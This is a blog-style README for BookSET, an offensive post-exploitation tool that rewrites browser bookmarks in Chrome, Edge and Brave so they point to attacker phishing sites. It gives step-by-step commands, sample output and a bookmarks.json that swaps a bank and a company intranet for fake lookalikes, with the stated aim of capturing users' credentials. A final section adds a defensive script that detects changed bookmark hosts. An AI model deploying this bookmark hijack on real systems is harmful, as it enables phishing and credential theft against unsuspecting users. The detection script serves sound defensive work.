BookSET - a simple Post-Exploitation Tool
It’s been a while since I dared to create something, and this time I bring you a tool that I think can add an interesting result to all the tests that we conduct as a red team for different companies.
During red team exercises, even after achieving access to a certain level, there are times when we need to go a step further, such as obtaining user access credentials. This is why I have created this tool.
BookSET is intended to modify bookmarks primarily for Google Chrome, but tests were also conducted on Edge and Brave browsers. Please note that this script can be used to capture credentials through phishing sites or redirect the victim to your EvilServer.
How does it work? :
Let’s clone the repository and install some libraries:
git clone https://github.com/edwardosorio/BookSET.git
cd BookSET
pip install -r requirements.txt
That’s it :D !!
[+] Help ! :
If you need to know the script's parameters, type:
python bookSET.py -h
____ _ ____ _____ _____
| __ ) ___ ___ | | __/ ___|| ____|_ _|
| _ \ / _ \ / _ \| |/ /\___ \| _| | |
| |_) | (_) | (_) | < ___) | |___ | |
|____/ \___/ \___/|_|\_\|____/|_____| |_|
[ just a simple post-exploitation tool :) by _mrpack ]
usage: bookSET.py [-h] [-recon] [-replace]
Get and Replace all Urls from Google Chrome BookMarks
optional arguments:
-h, --help show this help message and exit
-recon Get all URLs Bookmarks
-replace Replace URLs Bookmarks
[+] Recon Mode :
If you want to know what BookMarks the target has, then we just need to execute the following command line:
python bookSET.py -recon
and the output should be something like this:
____ _ ____ _____ _____
| __ ) ___ ___ | | __/ ___|| ____|_ _|
| _ \ / _ \ / _ \| |/ /\___ \| _| | |
| |_) | (_) | (_) | < ___) | |___ | |
|____/ \___/ \___/|_|\_\|____/|_____| |_|
[ just a simple post-exploitation tool :) by _mrpack ]
[+] Getting Urls from BookMarks:
- https://www.facebook.com
- https://www.bank.com
- https://www.twitter.com
- https://www.instagram.com
- https://intranet.companie.org
[+] Total of BookMarks identified : [5]
[+] bookmarks.json file content :
Now that we know all the BookMarks that the target has, we can check all the URLs and just make a few “fake websites” for some URLs that we want…
Once we have made the phishing sites, we can configure our “bookmarks.json” file. Its content is easy to understand: “current_url” is the URL that we want to change, and “new_url” is the URL that replaces it:
{
    "bookmark_bar": [
        {
            "current_url": "https://www.bank.com/",
            "new_url": "https://www.fakebank.com/"
        },
        {
            "current_url": "https://intranet.companie.org/",
            "new_url": "https://intranet.fakecompanie.org/"
        }
    ]
}
[+] Replace Mode :
Now that we have configured the bookmarks.json file, we can run the script again with the -replace parameter:
python bookSET.py -replace
and the output should be something like this:
____ _ ____ _____ _____
| __ ) ___ ___ | | __/ ___|| ____|_ _|
| _ \ / _ \ / _ \| |/ /\___ \| _| | |
| |_) | (_) | (_) | < ___) | |___ | |
|____/ \___/ \___/|_|\_\|____/|_____| |_|
[ just a simple post-exploitation tool :) by _mrpack ]
[+] URLs modified:
[-] https://www.fakebank.com/
[-] https://intranet.fakecompanie.org/
[+] Total of BookMarks replaced : [2]
Chrome it's running !!
[+] Chrome was Closed !
...
...
...
...
[+] Opening Chrome !
[+] Done !!
Once the script has finished, we can check all the changes.
NOTE: This script was tested for the following Web Browsers:
- Google Chrome
- Edge
- Brave
And tested on the following operating systems:
- Windows
- Linux
- Mac
You just need to change the Browser Path.
Conclusions :
- There are many ways to build on this idea and get better results.
- Users don’t check the URLs behind their bookmarks because they created those bookmarks themselves, so they trust them when they click … please don’t use this for bad purposes.
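For defenders, the replacement described above can be detected by comparing a known-good snapshot of the browser's Bookmarks file with its current content. The following is an added example, not part of BookSET; it assumes the Chromium Bookmarks JSON layout (`roots` with nested `children`, each URL entry carrying `guid`, `name` and `url`) and that an in-place edit leaves the entry's `guid` unchanged. The sample data is constructed from the URLs shown earlier.

```python
import json
from urllib.parse import urlsplit

def iter_bookmarks(node):
    """Yield (key, name, url) for every URL entry under a bookmark node."""
    if node.get("type") == "url":
        # Assumption: guid (or id) identifies the same bookmark across snapshots.
        yield node.get("guid") or node.get("id"), node.get("name", ""), node.get("url", "")
    for child in node.get("children", []):
        yield from iter_bookmarks(child)

def snapshot(bookmarks_json):
    """Map bookmark key -> (name, url) across all roots of a Bookmarks file."""
    snap = {}
    for root in json.loads(bookmarks_json).get("roots", {}).values():
        if isinstance(root, dict):  # skip non-folder values stored under "roots"
            for key, name, url in iter_bookmarks(root):
                snap[key] = (name, url)
    return snap

def changed_hosts(baseline, current):
    """Return bookmarks that still exist but now point at a different host."""
    findings = []
    for key, (name, old_url) in baseline.items():
        if key in current:
            new_url = current[key][1]
            if urlsplit(old_url).hostname != urlsplit(new_url).hostname:
                findings.append({"name": name, "was": old_url, "now": new_url})
    return findings

def _sample(bank_url):
    """Constructed sample in the Bookmarks file layout (not real user data)."""
    return json.dumps({"roots": {
        "bookmark_bar": {"type": "folder", "name": "Bookmarks bar", "children": [
            {"type": "url", "guid": "g-1", "name": "Bank", "url": bank_url},
            {"type": "folder", "name": "Work", "children": [
                {"type": "url", "guid": "g-2", "name": "Intranet",
                 "url": "https://intranet.companie.org/"}]}]},
        "other": {"type": "folder", "name": "Other", "children": []}}})

BASELINE = _sample("https://www.bank.com/")      # known-good snapshot
TAMPERED = _sample("https://www.fakebank.com/")  # same entry, host swapped

if __name__ == "__main__":
    for f in changed_hosts(snapshot(BASELINE), snapshot(TAMPERED)):
        print(f"[!] {f['name']}: {f['was']} -> {f['now']}")
```

In practice the baseline would be taken from a trusted backup or an endpoint management snapshot, and a host change with no matching user action is the signal worth alerting on.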